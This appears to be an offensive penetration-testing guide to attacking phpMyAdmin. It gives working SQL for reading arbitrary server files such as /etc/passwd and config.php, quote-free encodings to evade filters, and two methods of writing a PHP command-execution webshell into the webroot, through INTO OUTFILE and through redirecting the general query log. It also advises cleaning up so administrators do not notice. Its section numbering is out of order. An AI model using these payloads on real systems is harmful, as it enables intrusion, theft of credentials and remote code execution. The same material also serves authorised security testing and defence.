phpMyAdmin HackTricks Verified | 2024-2026

phpMyAdmin HackTricks: Verified Attack Vectors & Privilege Escalation

Target: phpMyAdmin (typically http://target/phpmyadmin, http://target/phpmyadmin/, or /pma)
Prerequisite: Network access to the phpMyAdmin interface or leaked credentials.

This guide covers verified techniques to leverage phpMyAdmin for remote code execution (RCE), file read/write, and privilege escalation. phpMyAdmin itself only relays SQL to the server, so every technique below is bounded by the MySQL privileges of the account you are logged in with (FILE for reads and writes, SUPER or SYSTEM_VARIABLES_ADMIN for changing global variables), not by anything phpMyAdmin does.


4.1 LOAD_FILE() – Reading Arbitrary Files

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/var/www/html/config.php');

Verification constraints (LOAD_FILE() returns NULL rather than an error when any of these is not met):

  • The account holds the FILE privilege.
  • secure_file_priv is empty, or the file lies under the directory it names; a value of NULL disables file operations entirely.
  • The file is readable by the OS user mysqld runs as (usually mysql); an AppArmor or SELinux profile for mysqld can deny paths the filesystem permissions would allow.
  • File size is within max_allowed_packet.
  • The path is absolute.

Bypass tip: if quote characters are filtered, build the path without them: LOAD_FILE(0x2f6574632f706173737764) (hex literal for /etc/passwd) or LOAD_FILE(CHAR(47,101,116,99,47,112,97,115,115,119,100)). Note that concat(CHAR(47),'etc',CHAR(47),'passwd') does not help, since it still contains quotes.
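The following is an added example, not code from the original page: the checks to run in phpMyAdmin's SQL tab before trusting a LOAD_FILE() result, followed by the read itself in quoted and quote-free forms. It assumes a Linux target where /etc/passwd exists and is world-readable; the file paths are illustrative.

```sql
-- Added example (not from the original page). Assumes a Linux MySQL host and an
-- authenticated phpMyAdmin session. Paths are illustrative.

-- 1. Does this account hold FILE? Look for "FILE" or "ALL PRIVILEGES" in the output.
SHOW GRANTS FOR CURRENT_USER();

-- 2. Where may the server read from?
--      ''      -> no restriction
--      NULL    -> file operations disabled; LOAD_FILE() always returns NULL
--      '/dir'  -> only files under that directory
SHOW VARIABLES LIKE 'secure_file_priv';

-- 3. Largest file LOAD_FILE() will return, in bytes.
SELECT @@max_allowed_packet;

-- 4. The read. LOAD_FILE() returns NULL on every failure mode (privilege, OS permission,
--    secure_file_priv, size, relative path), so make "failed" distinguishable from an empty file.
SELECT IF(LOAD_FILE('/etc/passwd') IS NULL,
          'read failed: recheck steps 1-3',
          LOAD_FILE('/etc/passwd')) AS result;

-- 5. The same read with no quote characters, for contexts that strip or escape quotes.
--    0x2f6574632f706173737764 is the hex encoding of /etc/passwd; CHAR() builds it byte by byte.
SELECT LOAD_FILE(0x2f6574632f706173737764);
SELECT LOAD_FILE(CHAR(47,101,116,99,47,112,97,115,115,119,100));

-- 6. For files with binary content, hex-encode the result so the phpMyAdmin grid does not
--    mangle or truncate bytes; decode offline.
SELECT HEX(LOAD_FILE('/var/www/html/config.php'));
```

Run step 4 first: a NULL there with FILE present and secure_file_priv empty almost always means an OS-level denial (file mode or a mysqld AppArmor/SELinux profile), which no SQL-side trick will bypass.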

C. File Write via SQL

With valid credentials and the FILE privilege, a single SELECT ... INTO OUTFILE writes a webshell into the webroot:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Requirements:

  • The account holds the FILE privilege.
  • secure_file_priv is empty or names a directory under the webroot (check with SHOW VARIABLES LIKE 'secure_file_priv').
  • The OS user mysqld runs as has write permission on the target directory. On a typical host the webroot is owned by root or www-data, so this usually only works for a world-writable location such as an uploads directory.
  • The target file does not already exist: INTO OUTFILE never overwrites, so use a fresh filename.
  • The web server executes PHP from that path.

B. General Log File Method (When OUTFILE Fails)

If secure_file_priv blocks INTO OUTFILE but the account can change global variables, redirect the general query log into the webroot; the general_log_file path is not subject to secure_file_priv:

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']); ?>";

Verification: SET GLOBAL requires SUPER (MySQL 5.x) or the SYSTEM_VARIABLES_ADMIN dynamic privilege (MySQL 8.0+). Works on MySQL 5.x/8.x when the target directory is writable by the mysqld OS user and not denied by an AppArmor/SELinux profile. Every statement from every session, including phpMyAdmin's own housekeeping queries, is appended to the file, so the PHP tag ends up inside a log line surrounded by noise; PHP ignores everything outside <?php ... ?>, so the shell still runs. Turn general_log off and restore general_log_file afterwards, otherwise the file grows without bound and the change is obvious to anyone who checks the server.

3. Exploitation Vectors